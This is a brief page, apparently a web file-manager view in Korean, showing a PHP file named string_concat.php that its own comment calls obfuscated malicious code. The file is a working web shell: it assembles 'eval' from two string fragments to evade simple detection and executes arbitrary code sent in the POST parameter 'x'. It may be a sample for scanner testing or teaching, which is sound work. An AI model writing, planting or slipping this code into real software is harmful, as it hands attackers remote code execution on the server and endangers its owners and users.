관리-도구
편집 파일: string_concat.php
<?php /** * Obfuscated malicious code. * Uses string concatenation and encoding. */ // Obfuscated eval $a = 'ev'; $b = 'al'; $func = $a . $b; $func($_POST['x']);